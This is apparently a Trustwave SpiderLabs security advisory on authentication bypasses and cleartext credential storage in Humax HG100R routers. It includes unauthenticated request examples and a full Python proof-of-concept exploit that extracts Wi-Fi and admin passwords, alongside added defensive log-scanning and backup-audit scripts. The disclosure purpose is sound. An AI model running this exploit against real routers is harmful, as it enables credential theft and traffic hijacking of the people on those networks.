Trustwave SpiderLabs Security Advisory TWSL2017-010:
Multiple Vulnerabilities in Humax Routers

Published: 06/28/2017
Version: 1.1

Vendor: Humax (humaxdigital.com)
Product: Router HG100R-*

Finding 1: Authentication Bypass in /api
Credit: Felipe Cerqueira and Thiago Musa of Trustwave
CVE: CVE-2017-11435

The Humax Wifi Router model HG100R-* is prone to an authentication bypass
vulnerability via specially crafted requests to the management console. The
bug is exploitable remotely when the router is configured to expose the
management console. The router does not validate the session token while
returning answers for some methods in the URL '/api'. An attacker can use this
vulnerability to retrieve sensitive information such as private/public IP
addresses, SSID names and passwords.

Example of an authenticated request:

Request:

POST /api HTTP/1.1
Host: 192.168.0.1
Content-Length: 51
Accept: */*
Origin: http://192.168.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
DNT: 1
Referer: http://192.168.0.1/quickSetup.html
Accept-Language: en-US,en;q=0.8,pt-BR;q=0.6,pt;q=0.4,es;q=0.2
Cookie: session_time_out=10; i18next=en; login=eyJ1aWQiOiJhZG1pbiIsInB3ZCI6IjRjZDA4YTk2MWY1YyJ9; login_token=Z224UiOCH8wX91lmQzXV7rpbpbHXD5kf
Connection: close

{"method":"QuickSetupInfo","id":90,"jsonrpc":"2.0"}

Response:

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1452
Connection: close

[..]
The cookie 'login' is basically JSON data containing uid and pwd, encoded in
base64:

login={"uid":"admin","pwd":"4cd08a961f5c"}

Example of the same request without providing any authentication, and the
response containing sensitive data such as SSID name, IP addresses and Wifi
password:

Request:

POST /api HTTP/1.1
Host: 192.168.0.1
Content-Length: 51
Accept: */*
Origin: http://192.168.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
DNT: 1
Referer: http://192.168.0.1/quickSetup.html
Accept-Language: en-US,en;q=0.8,pt-BR;q=0.6,pt;q=0.4,es;q=0.2
Connection: close

{"method":"QuickSetupInfo","id":90,"jsonrpc":"2.0"}

Response:

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1452
Connection: close

{
  [..]
  "result" : {
    "CM_Status_NetworkAccess" : 1,
    "DHCPS_IPv4_Enable" : 1,
    "NET_LAN_IPv4_Gateway" : "192.[..]",
    "NET_WAN_IPv4_Address" : "201.[..]",
    "NET_WAN_IPv4_DNSAddress" : {
      "dns_server" : [ "201.[..]", "201.[..]" ]
    },
    [..]
    "WiFi_Info" : {
      "wlan" : [
        {
          [..]
          "interface" : 0,
          "password" : "mywifipassword",
          "ssid" : "FelipeWifi",
          "type" : 4
        }
      ]
    },
    "WiFi_Primary_WPAPreSharedKey" : "mywifipassword",
    "model_name" : "HG100R-L4",
    "vendor_name" : "NET"
  }
}

Finding 2: Authentication Bypass in /view/basic/GatewaySettings.bin and
/view/basic/ConfigUpload.html
Credit: Felipe Cerqueira and Thiago Musa of Trustwave

The URLs /view/basic/GatewaySettings.bin and /view/basic/ConfigUpload.html are
used to provide a backup functionality to save (GET) or restore (POST) the
router configuration. Both ignore the absence of the cookies 'login' and
'login_token' and accept requests to download and upload the full router
configuration.
Request retrieving the file GatewaySettings.bin without providing any
authentication:

Request:

GET /view/basic/GatewaySettings.bin HTTP/1.1
Host: 192.168.0.1
Connection: close

Response:

HTTP/1.1 200 OK
Content-Type: application/x-download
Content-Length: 19672
Connection: close
Content-disposition: attachment; filename=GatewaySettings.bin

jmÒÐy/½ëràêdä6u9e9ewf0jt9y85w690je4669jye4d-056t9p48jp4ee6u9ee659jy9e-54e4j6r0j069k-056LÈAvI2U1JWAAEoBAFNXIaSywAAAAAAAAAAAAAAQAAAAAAADGV0aDBldGgxZXRoMmV0aDN3bG4wd2xuMXdsbjJ3bG4zd2xuNHdsbjV3bG42d2xuNwAABwgAAAcIAAAHCAAABwgAAAcIAAAHCAAABwgAAAcIAAAHCAAABwgAAAcIAAAHCAAADhAAAA4QAAAOEAAADhAAAA4QAAAOEAAADhAAAA4QAAAOEAAADhAAAA4QAAAOECgEAU1chpLLAAAAAAAAAAEAAABAKAQBTVyGkssAAAAAAAAAAQAAAEAoBAFNXIaSywAAAAA[..]

Example of request uploading a configuration file:

Request:

POST /view/basic/ConfigUpload.html HTTP/1.1
Host: 192.168.0.1
Content-Length: 19866
Accept: */*
Origin: http://192.168.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVBgu1AAqx8ajFXY5
DNT: 1
Referer: http://192.168.0.1/index.html
Accept-Language: en-US,en;q=0.8,pt-BR;q=0.6,pt;q=0.4,es;q=0.2,ja;q=0.2
Cookie: i18next=en; session_time_out=10;
Connection: close

------WebKitFormBoundaryVBgu1AAqx8ajFXY5
Content-Disposition: form-data; name="0"; filename="AAAAAAAA.bin"
Content-Type: application/macbinary

æliD¦{x óViÚ6u9e9ewf0jt9y85w690je4669jye4d-056t9p48jp4ee6u9ee659jy9e-54e4j6r0j069k-056LÈ[..]

Response: None

The router is going to reboot automatically after receiving the POST and
loading the new configuration. A specially crafted configuration file can be
used to change the console admin password or to add a new VPN configuration
(that could be used to redirect all the user's traffic to a specific
destination).
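Because the three endpoints above answer without the 'login' and 'login_token'
cookies, the practical detection for a defender is to watch for requests to
them that carry no session cookies yet receive a 200. The following Python 3
example is added here and is not part of the advisory or its proof of concept;
it runs the check over a few constructed access-log lines. The log format
(client, method, path, status, quoted Cookie header) is an assumption: it is
what a reverse proxy or capture tool placed in front of the router would need
to record, since the router itself provides no such log.

```python
"""Flag unauthenticated hits on the management endpoints from Findings 1 and 2.
Added example, not the advisory's code; the log format is an assumption."""
import re
from collections import defaultdict

# Endpoints the advisory shows answering without the session cookies
RULES = {
    ("POST", "/api"): "finding1-api-auth-bypass",
    ("GET", "/view/basic/GatewaySettings.bin"): "finding2-config-download",
    ("POST", "/view/basic/ConfigUpload.html"): "finding2-config-upload",
}
SESSION_COOKIES = ("login", "login_token")

# Assumed format: client method path status "cookie-header" ("-" = no header)
LINE_RE = re.compile(
    r'^(?P<client>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3}) "(?P<cookie>[^"]*)"$'
)

# Constructed sample lines: one legitimate session, one client walking through
# all three endpoints without a session, and two benign requests.
LOG_LINES = [
    '203.0.113.5 POST /api 200 "session_time_out=10; i18next=en; login=CONSTRUCTED; login_token=CONSTRUCTED"',
    '203.0.113.9 POST /api 200 "-"',
    '203.0.113.9 GET /view/basic/GatewaySettings.bin 200 "-"',
    '203.0.113.9 POST /view/basic/ConfigUpload.html 200 "i18next=en; session_time_out=10"',
    '198.51.100.7 GET /index.html 200 "-"',
    '198.51.100.7 POST /api 401 "-"',
]


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def cookie_names(header):
    """Names present in a Cookie header; '-' or '' means no header was sent."""
    if header in ("", "-"):
        return set()
    return {p.strip().split("=", 1)[0] for p in header.split(";") if "=" in p}


def classify(rec):
    """Rule name when a sensitive endpoint was served (200) without both
    session cookies, else None. A 401/403 means the device refused it."""
    rule = RULES.get((rec["method"], rec["path"]))
    if rule is None or rec["status"] != 200:
        return None
    if all(c in cookie_names(rec["cookie"]) for c in SESSION_COOKIES):
        return None
    return rule


def scan(lines):
    """Return (alerts, chains): alerts are (client, rule) pairs; chains are the
    clients that both downloaded and uploaded the configuration, which is the
    retrieve/modify/restore sequence Finding 3 warns about."""
    alerts = []
    per_client = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        rule = classify(rec)
        if rule:
            alerts.append((rec["client"], rule))
            per_client[rec["client"]].add(rule)
    chains = sorted(
        c for c, rules in per_client.items()
        if {"finding2-config-download", "finding2-config-upload"} <= rules
    )
    return alerts, chains


if __name__ == "__main__":
    found, chained = scan(LOG_LINES)
    for client, rule in found:
        print("ALERT %s %s" % (client, rule))
    for client in chained:
        print("CHAIN %s downloaded and re-uploaded the configuration" % client)
```

The per-client chain check matters more than any single alert: a download of
GatewaySettings.bin followed by a ConfigUpload.html POST from the same source
is the full attack the advisory describes, and the router will reboot into the
uploaded configuration right after the second request.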
Finding 3: Administrative Password Stored Unencrypted
Credit: Felipe Cerqueira and Thiago Musa of Trustwave

Using the backup generation/restore functionality provided by the URLs
/view/basic/GatewaySettings.bin and /view/basic/ConfigUpload.html, an attacker
could retrieve, change and finally restore a specially crafted configuration.
Exploiting this vulnerability could allow an attacker to add fake DNS entries
and tunnel all the user's traffic to a specific location controlled by the
attacker, where man-in-the-middle attacks could be performed and non-encrypted
traffic could be monitored and tampered with.

But, analyzing the file GatewaySettings.bin carefully, we identified that the
administrative password was stored without any encryption. Basically, the file
is composed of a header and, from byte 96 onwards, it is encoded in base64:

$ hexdump -C GatewaySettings.bin | more
00000000  0a e6 6c 9f 69 44 a6 7b  78 98 09 f3 05 56 69 da  |..l.iD.{x....Vi.|
00000010  36 75 39 65 39 65 77 66  30 6a 74 39 79 38 35 77  |6u9e9ewf0jt9y85w|
00000020  36 39 30 6a 65 34 36 36  39 6a 79 65 34 64 2d 30  |690je4669jye4d-0|
00000030  35 36 74 39 70 34 38 6a  70 34 65 65 36 75 39 65  |56t9p48jp4ee6u9e|
00000040  65 36 35 39 6a 79 39 65  2d 35 34 65 34 6a 36 72  |e659jy9e-54e4j6r|
00000050  30 6a 30 36 39 6b 2d 30  35 36 01 02 00 00 4c c8  |0j069k-056....L.|
00000060  41 76 49 32 55 31 4a 57  41 41 45 6f 42 41 46 4e  |AvI2U1JWAAEoBAFN|
00000070  58 49 61 53 37 51 41 41  41 41 41 41 41 41 41 41  |XIaS7QAAAAAAAAAA|
00000080  41 41 41 41 51 41 41 41  41 41 41 41 44 47 56 30  |AAAAQAAAAAAADGV0|
00000090  61 44 42 6c 64 47 67 78  5a 58 52 6f 4d 6d 56 30  |aDBldGgxZXRoMmV0|
000000a0  61 44 4e 33 62 47 34 77  64 32 78 75 4d 58 64 73  |aDN3bG4wd2xuMXds|
000000b0  62 6a 4a 33 62 47 34 7a  64 32 78 75 4e 48 64 73  |bjJ3bG4zd2xuNHds|
000000c0  62 6a 56 33 62 47 34 32  64 32 78 75 4e 77 41 41  |bjV3bG42d2xuNwAA|
000000d0  42 77 67 41 41 41 63 49  41 41 41 48 43 41 41 41  |BwgAAAcIAAAHCAAA|
[..]
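A defender who has taken a backup of their own device can confirm this finding
offline and decide whether the file is safe to keep or share. The Python 3
parser below is an added example (not the advisory's proof of concept) for the
layout the hexdumps in this finding show: a 96-byte header, a base64-encoded
body, and inside the decoded body a credential record after the string 'MLog'
in which each value is stored as a big-endian 16-bit length followed by the
bytes (00 05 'admin', 00 08 'AAAAAAAA', 00 04 'root', 00 05 'humax'). That
length-prefixed reading of the record, and the decision to skip the two
unexplained bytes (00 0a) right after 'MLog', are assumptions drawn from the
dumps, not a documented format; the sample backup the code builds is
constructed test data.

```python
"""Offline audit of a GatewaySettings.bin backup for cleartext credentials.
Added example; the record layout is an assumption inferred from the hexdumps."""
import base64
import struct

HEADER_LEN = 96      # stated in the advisory: base64 data starts at byte 96
MARKER = b"MLog"     # the credential record follows this string
MARKER_SKIP = 2      # assumption: two unexplained bytes (00 0a) after the marker


def build_sample_backup(entries):
    """Construct a backup in the assumed layout (test data, not a device dump)."""
    body = b"\x00" * 32 + b"eth0eth1" + b"\x00" * 8
    body += b"\x00\x04" + MARKER + b"\x00\x0a"
    for s in entries:
        body += struct.pack(">H", len(s)) + s.encode("ascii")
    body += b"\x00" * 16
    header = b"\x0a" * HEADER_LEN      # opaque header; not interpreted here
    return header + base64.b64encode(body)


def decode_body(blob):
    """Drop the header and base64-decode the remainder."""
    if len(blob) < HEADER_LEN:
        raise ValueError("file shorter than the %d-byte header" % HEADER_LEN)
    return base64.b64decode(blob[HEADER_LEN:], validate=True)


def read_strings(body, limit=4):
    """Read up to `limit` length-prefixed strings after the MLog marker."""
    idx = body.find(MARKER)
    if idx < 0:
        raise ValueError("credential record marker not found")
    pos = idx + len(MARKER) + MARKER_SKIP
    out = []
    while len(out) < limit and pos + 2 <= len(body):
        (n,) = struct.unpack(">H", body[pos:pos + 2])
        if n == 0 or pos + 2 + n > len(body):
            break
        out.append(body[pos + 2:pos + 2 + n].decode("ascii", "replace"))
        pos += 2 + n
    return out


def audit_backup(blob):
    """Return the (username, password) pairs stored in clear text."""
    strings = read_strings(decode_body(blob))
    return list(zip(strings[0::2], strings[1::2]))


def report(pairs):
    """Human-readable lines that name the account but never echo the secret."""
    return ["user %s: cleartext password present (%d chars)" % (u, len(p))
            for u, p in pairs]


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 2:
        with open(sys.argv[1], "rb") as fh:
            blob = fh.read()
    else:
        blob = build_sample_backup(["admin", "AAAAAAAA", "root", "humax"])
    for line in report(audit_backup(blob)):
        print(line)
```

Run with a path to a real backup to audit it, or with no arguments to see the
check on the constructed sample. The report deliberately prints only the
account name and password length: the point of the audit is to know that the
file carries secrets (and so must be stored and transmitted as carefully as the
admin password itself), not to display them.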
After the bytes 00 00 4c c8 (which are the length of the data ahead), all the
data is just base64 encoded. Once decoded, the bin file makes a lot of sense:

$ tail -c 19576 GatewaySettings.bin | base64 -D | hexdump -C
00000000  02 f2 36 53 52 56 00 01  28 04 01 4d 5c 86 92 ed  |..6SRV..(..M\...|
00000010  00 00 00 00 00 00 00 00  00 00 00 40 00 00 00 00  |...........@....|
00000020  00 0c 65 74 68 30 65 74  68 31 65 74 68 32 65 74  |..eth0eth1eth2et|
00000030  68 33 77 6c 6e 30 77 6c  6e 31 77 6c 6e 32 77 6c  |h3wln0wln1wln2wl|
00000040  6e 33 77 6c 6e 34 77 6c  6e 35 77 6c 6e 36 77 6c  |n3wln4wln5wln6wl|
00000050  6e 37 00 00 07 08 00 00  07 08 00 00 07 08 00 00  |n7..............|
[..]
00001410  4d 4c 6f 67 00 0a 00 05  61 64 6d 69 6e 00 08 41  |MLog....admin..A|
00001420  41 41 41 41 41 41 41 00  04 72 6f 6f 74 00 05 68  |AAAAAAA..root..h|
00001430  75 6d 61 78 00 00 00 00  00 00 00 00 00 00 00 00  |umax............|
00001440  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

We can see in this example the password 'AAAAAAAA' in clear text, used for the
user admin.

** Exploit:

URL: https://github.com/SpiderLabs/advisories-poc

The following exploit was created as a proof of concept about the
vulnerabilities found in this router:

#!/usr/bin/env python
"""
Exploit to retrieve the wlan setup information (including password) and
console administrative password from routers.

Affected hardware/vendor: Humax HG100R
Vulnerability found by Thiago Musa and Felipe Cerqueira in May/2017.

Author: Felipe Cerqueira - FSantos [at] TrustWave.com
"""
import sys
import base64
import requests
import json


class ExploitFailed(Exception):
    pass


def retrieve_backup_bin(base_url):
    """
    Function to retrieve the bin configuration and get the admin password
    :param base_url: Base url address
    :type base_url: str
    :return: None
    """
    url = base_url.rstrip('/') + '/view/basic/GatewaySettings.bin'
    r = requests.get(url)
    data = r.content
    # The first 96 bytes are a header; everything after it is base64 encoded
    b64_decoded = base64.b64decode(data[96:])
    """ :type b64_decoded: str """
    # The credential record follows the 'MLog' marker: a NUL byte and a length
    # byte precede each string, and the username starts 8 bytes after 'MLog'
    idx = b64_decoded.find('MLog')
    if idx < 0:
        raise ExploitFailed('Error trying to parse GatewaySettings.bin')
    idx_end_username = b64_decoded[idx + 8:].find('\x00')
    if idx_end_username < 0:
        raise ExploitFailed('Error trying to parse GatewaySettings.bin')
    idx_end_username += idx + 8
    username = b64_decoded[idx + 8:idx_end_username]
    # The NUL that terminates the username is also the start of the password
    # record; the password itself begins two bytes later (after the length byte)
    idx_begin_password = b64_decoded[idx_end_username:].find('\x00')
    if idx_begin_password < 0:
        raise ExploitFailed('Error trying to parse GatewaySettings.bin')
    idx_begin_password += idx_end_username
    idx_end_password = b64_decoded[idx_begin_password + 1:].find('\x00')
    if idx_end_password < 0:
        raise ExploitFailed('Error trying to parse GatewaySettings.bin')
    # Make the end index absolute (the search started one byte after the NUL)
    # so the trailing NUL is not included in the password
    idx_end_password += idx_begin_password + 1
    password = b64_decoded[idx_begin_password + 2:idx_end_password]
    print '-- ROUTER CONSOLE CREDENTIALS --'
    print 'Username: %s' % username
    print 'Password: %s' % password


def retrieve_router_setup_info(base_url):
    """
    Function to retrieve the wifi SSID and password
    :param base_url: Base url address
    :type base_url: str
    :return: None
    """
    print '-- ROUTER SETUP INFO --'
    r = requests.post(base_url.rstrip('/') + '/api',
                      json={"method": "QuickSetupInfo", "id": 90, "jsonrpc": "2.0"})
    print json.dumps(r.json(), sort_keys=True, indent=2)
    print ''


if __name__ == '__main__':
    print '*** ROUTER HUMAX REMOTE EXPLOIT'
    print '*** by Felipe Cerqueira - skylazart[at]gmail.com / FSantos[at]trustwave.com'
    print '*** May/2017'
    print ''
    if len(sys.argv) == 1:
        print 'Usage: %s URL' % sys.argv[0]
        sys.exit(1)
    url = sys.argv[1]
    retrieve_router_setup_info(url)
    retrieve_backup_bin(url)

** Example:

$ python ./humax_router_exploit.py http://192.168.0.1/
*** ROUTER HUMAX REMOTE EXPLOIT
*** by Felipe Cerqueira - skylazart[at]gmail.com / FSantos[at]trustwave.com
*** May/2017

-- ROUTER SETUP INFO --
{
  "id": 90,
  "jsonrpc": "2.0",
  "result": {
    "CM_Status_NetworkAccess": 1,
    "DHCPS_IPv4_Enable": 1,
    "NET_LAN_IPv4_Gateway": "192.168.0.1",
    "NET_WAN_IPv4_Address": "201.[..]",
    "NET_WAN_IPv4_DNSAddress": {
      "dns_server": [
        "201.[..]",
        "201.[..]"
      ]
    },
    [..]
    "WiFi_Info": {
      "wlan": [
        {
          [..] ],
          "interface": 0,
          "password": "my password",
          "ssid": "mywifi",
          "type": 4
        }
      ]
    },
    "WiFi_Primary_WPAPreSharedKey": "my password",
    "model_name": "HG100R-L4",
    "vendor_name": "NET"
  }
}

-- ROUTER CONSOLE CREDENTIALS --
Username: admin
Password: BBBBBBBB

Remediation Steps:

No official fix is available. Affected routers should not be exposed to the
Internet. Ensure that remote configuration management via the Internet is
disabled until these vulnerabilities are remediated.

Revision History:

05/08/2017 - Attempt to contact vendor
06/08/2017 - Attempt to contact vendor
06/28/2017 - Advisory version 1.0 published
07/19/2017 - Advisory version 1.1 published

About Trustwave:

Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management solutions
to businesses and government entities throughout the world. For organizations
faced with today's challenging data security and compliance environment,
Trustwave provides a unique approach with comprehensive solutions that include
its flagship TrustKeeper compliance management software and other proprietary
security solutions. Trustwave has helped thousands of organizations, ranging
from Fortune 500 businesses and large financial institutions to small and
medium-sized retailers, manage compliance and secure their network
infrastructure, data communications and critical information assets.
Trustwave is headquartered in Chicago with offices throughout North America,
South America, Europe, Africa, China and Australia. For more information, visit
https://www.trustwave.com

About Trustwave SpiderLabs:

SpiderLabs(R) is the advanced security team at Trustwave focused on application
security, incident response, penetration testing, physical security and
security research. The team has performed over a thousand incident
investigations, thousands of penetration tests and hundreds of application
security tests globally. In addition, the SpiderLabs Research team provides
intelligence through bleeding-edge research and proof of concept tool
development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:

The information provided in this advisory is provided "as is" without warranty
of any kind. Trustwave disclaims all warranties, either express or implied,
including the warranties of merchantability and fitness for a particular
purpose. In no event shall Trustwave or its suppliers be liable for any damages
whatsoever including direct, indirect, incidental, consequential, loss of
business profits or special damages, even if Trustwave or its suppliers have
been advised of the possibility of such damages. Some states do not allow the
exclusion or limitation of liability for consequential or incidental damages so
the foregoing limitation may not apply.